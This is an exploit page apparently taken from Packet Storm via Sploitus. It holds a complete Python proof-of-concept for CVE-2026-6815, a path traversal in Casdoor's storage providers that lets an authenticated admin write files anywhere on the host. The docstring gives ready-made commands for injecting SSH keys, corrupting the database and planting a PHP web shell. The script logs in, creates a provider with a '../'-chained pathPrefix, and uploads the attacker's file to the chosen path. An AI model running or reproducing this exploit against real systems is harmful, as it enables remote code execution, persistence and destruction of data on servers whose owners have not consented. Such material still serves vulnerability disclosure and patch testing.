Share
## https://sploitus.com/exploit?id=PACKETSTORM:222249
# Exploit Title: Casdoor 3.54.1 - Arbitrary File Write via Path Traversal 
    # Date: 2026-05-11
    # Exploit Author: sixpain
    # Vendor Homepage: https://casdoor.org/
    # Software Link: https://github.com/casdoor/casdoor
    # Version: < 3.54.1
    # Tested on: Linux / Docker
    # CVE : CVE-2026-6815
    
    """
    Casdoor Arbitrary File Write / Path Traversal PoC (CVE-2026-6815)
    ================================================
    
    DESCRIPTION:
    This script exploits a Path Traversal vulnerability in the storage provider 
    management component of Casdoor. By creating a 'Local File System' provider 
    with a manipulated 'pathPrefix', an authenticated administrator can bypass 
    the storage sandbox to write, overwrite, or delete arbitrary files on the 
    underlying host filesystem.
    
    IMPACT:
    - Remote Code Execution (RCE) via SSH key injection or web shell upload.
    - Persistent Denial of Service (DoS) by corrupting core application binaries 
      or database files (e.g., casdoor.db).
    
    USAGE EXAMPLES:
    1. SSH Key Injection for RCE:
       python3 poc.py --url http://target:8000 --usr admin --psw 123 --file id_rsa.pub --rpath /home/casdoor/.ssh/authorized_keys
    
    2. Persistent DoS (Database Corruption):
       python3 poc.py --url http://target:8000 --usr admin --psw 123 --file dummy.txt --rpath /app/casdoor.db
    
    3. Reverse Shell (via secondary web server webroot):
       python3 poc.py --url http://target:8000 --usr admin --psw 123 --file shell.php --rpath /var/www/html/shell.php
    
    TROUBLESHOOTING & TECHNICAL NOTES:
    - APP & ORG CONTEXT: By default, the script targets the 'app-built-in' application 
      and 'built-in' organization. If you have credentials for custom 
      namespaces, specify them using the --appname and --orgname flags.
    - FILE OVERWRITE BEHAVIOR: Successful overwriting occurs only once per unique 
      remote path. Casdoor's resource management logic prevents direct subsequent 
      overwrites by appending increments (e.g., file-1.ext, file-2.ext) to the 
      resource name if the entry already exists in the application's internal 
      database. To re-exploit the same path, the specific resource entry must 
      usually be deleted via the UI/API or a different provider name must be used.
    - PERMISSIONS: Exploitation success is dependent on the OS-level permissions 
      of the user account running the Casdoor service.
    - VERBOSE MODE: Use -v or --verbose to inspect raw API requests and responses.
    
    DISCLAIMER:
    This tool is for educational and coordinated disclosure purposes only. 
    Unauthorized testing against systems you do not own is illegal.
    """
    
    
    import argparse
    import requests
    import json
    import os
    
    def log_request(response, verbose):
        """Prints request and response details if verbose mode is enabled."""
        if verbose:
            print("\n" + "="*50)
            print(f"DEBUG - REQUEST: {response.request.method} {response.request.url}")
            print(f"HEADERS: {json.dumps(dict(response.request.headers), indent=2)}")
            if response.request.body:
                # Handle potential bytes body for multipart
                body = response.request.body
                if isinstance(body, bytes):
                    print(f"BODY: <binary data, length {len(body)}>")
                else:
                    print(f"BODY: {body}")
            print("-" * 50)
            print(f"DEBUG - RESPONSE: {response.status_code}")
            print(f"HEADERS: {json.dumps(dict(response.headers), indent=2)}")
            try:
                print(f"JSON BODY: {json.dumps(response.json(), indent=2)}")
            except:
                print(f"RAW BODY: {response.text[:500]}...") 
            print("="*50 + "\n")
    
    def run_poc():
        parser = argparse.ArgumentParser(description="Casdoor Path Traversal Exploitation PoC")
        parser.add_argument("--url", required=True, help="Target base URL (e.g., http://casdoor:8000)")
        parser.add_argument("--usr", default="admin", help="Login username")
        parser.add_argument("--psw", default="123", help="Login password")
        parser.add_argument("--file", required=True, help="Local file to upload")
        parser.add_argument("--rpath", required=True, help="Absolute remote path (e.g., /tmp/pwned.txt)")
        parser.add_argument("--appname", default='app-built-in', help="Target Casdoor Application Name")
        parser.add_argument("--orgname", default='built-in', help="Target Casdoor Organization Name")
        parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose logging")
        
        args = parser.parse_args()
        
        # Sanitize and validate URL schema
        target_url = args.url.strip().rstrip('/')
        if not target_url.startswith(('http://', 'https://')):
            print("[!] No protocol specified. Defaulting to http://")
            target_url = f"http://{target_url}"
        
        session = requests.Session()
    
        # Setting common user agent
        session.headers.update({
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0"
        })
    
        # --- STEP 1: INITIAL SESSION ---
        print(f"[*] Step 1: Retrieving initial session cookie...")
        try:
            r1 = session.get(f"{target_url}/login/built-in")
            log_request(r1, args.verbose)
            
            if "casdoor_session_id" not in session.cookies:
                print("[-] Error: Failed to retrieve casdoor_session_id.")
                return
            print(f"[+] Session ID obtained: {session.cookies.get('casdoor_session_id')}")
    
            # --- STEP 2: LOGIN / PRIVILEGE ESCALATION ---
            print(f"[*] Step 2: Logging in as {args.usr}...")
            login_payload = {
                "application": args.appname,
                "organization": args.orgname,
                "username": args.usr,
                "password": args.psw,
                "autoSignin": True,
                "signinMethod": "Password",
                "type": "login"
            }
            
            r2 = session.post(
                f"{target_url}/api/login", 
                data=json.dumps(login_payload),
                headers={"Content-Type": "text/plain;charset=UTF-8"}
            )
            log_request(r2, args.verbose)
            
            login_res = r2.json()
            if login_res.get("status") == "ok" and 'admin' in login_res.get("data").lower():
                print("[+] Login successful. Admin privileges confirmed.")
            else:
                print("[!] Warning: Not an admin or login failed. Attempting to proceed anyway...")
    
            # --- STEP 2.5: VERSION CHECK ---
            print(f"[*] Step 2.5: Checking Casdoor version...")
            try:
                r_version = session.get(f"{target_url}/api/get-version-info")
                log_request(r_version, args.verbose)
                if r_version.status_code == 200:
                    version_data = r_version.json().get("data", {})
                    if not version_data:
                         # Some versions might return data directly or in different format
                         version_data = r_version.json()
                    
                    version = version_data.get("version", "unknown")
                    print(f"[+] Target Casdoor version: {version}")
                    
                    # Check if version is patched (>= 3.54.1)
                    is_vulnerable = True
                    if version != "unknown" and version != "dev":
                        try:
                            v_clean = version.lstrip('v').split('-')[0]
                            v_parts = [int(p) for p in v_clean.split('.')]
                            if v_parts >= [3, 54, 1]:
                                is_vulnerable = False
                        except:
                            pass # Parsing error, assume vulnerable or let user decide
                    
                    if not is_vulnerable:
                        print(f"[!] WARNING: Target version {version} is likely PATCHED (>= 3.54.1) and this PoC will not work.")
                        choice = input("[?] Do you want to continue anyway? (y/N): ").lower()
                        if choice != 'y':
                            print("[-] Aborting.")
                            return
                else:
                    print("[!] Warning: Could not retrieve version info (Status: {}).".format(r_version.status_code))
            except Exception as e:
                print(f"[!] Error during version check: {e}")
    
    
            # --- STEP 3: CREATE MALICIOUS STORAGE PROVIDER ---
            print("[*] Step 3: Creating Path Traversal Provider...")
            provider_payload = {
                "owner": "admin",
                "name": "path_traversal",
                "createdTime": "2026-02-20T17:59:58+01:00",
                "displayName": "Path Traversal Provider",
                "category": "Storage",
                "type": "Local File System",
                "method": "Normal",
                "pathPrefix": "../../../../../../../../../"
            }
            
            r3 = session.post(
                f"{target_url}/api/add-provider", 
                data=json.dumps(provider_payload),
                headers={"Content-Type": "text/plain;charset=UTF-8"}
            )
            log_request(r3, args.verbose)
            
            prov_res = r3.json()
            msg = prov_res.get("msg", "")
            if prov_res.get("status") == "ok":
                print("[+] Malicious provider created successfully.")
            elif "UNIQUE constraint failed" in msg:
                print("[*] Provider 'path_traversal' already exists. Reusing it.")
            else:
                print(f"[-] Failed to create provider: {msg}")
                if "pathPrefix" in msg and "is not allowed" in msg:
                    print(f"[!] Escape sequence is sanitized. Check Casdoor version < 3.54.1 (CVE-2026-6815 is likely fixed).")
                return
    
            # --- STEP 4: FILE UPLOAD (EXPLOITATION) ---
            print(f"[*] Step 4: Uploading {args.file} to {args.rpath}...")
            upload_params = {
                "owner": args.orgname,
                "user": args.usr,
                "application": args.appname,
                "tag": "custom",
                "parent": "ResourceListPage",
                "fullFilePath": args.rpath,
                "provider": "path_traversal"
            }
            
            if not os.path.exists(args.file):
                print(f"[-] Error: Local file {args.file} not found.")
                return
    
            with open(args.file, 'rb') as f:
                # Note: headers are handled automatically by requests for multipart/form-data
                files = {'file': (os.path.basename(args.file), f, 'application/octet-stream')}
                r4 = session.post(f"{target_url}/api/upload-resource", params=upload_params, files=files)
                log_request(r4, args.verbose)
                
                upload_res = r4.json()
    
            if upload_res.get("status") == "ok":
                print("\n" + "!"*25)
                print(" EXPLOIT SUCCESSFUL")
                print("!"*25 + "\n")
    
                print(f"Response Path")
                print(25*'-')
                print(f'\t-data : {upload_res.get('data')}')
                print(f'\t-data2: {upload_res.get('data2')}')
                print(f'\t-data3: {upload_res.get('data3')}')
                print(25*'-')
    
            else:
                    print(f"[-] Upload failed: {upload_res.get('msg')}")
    
        except Exception as e:
            print(f"[-] An unexpected error occurred: {e}")
    
    if __name__ == "__main__":
        run_poc()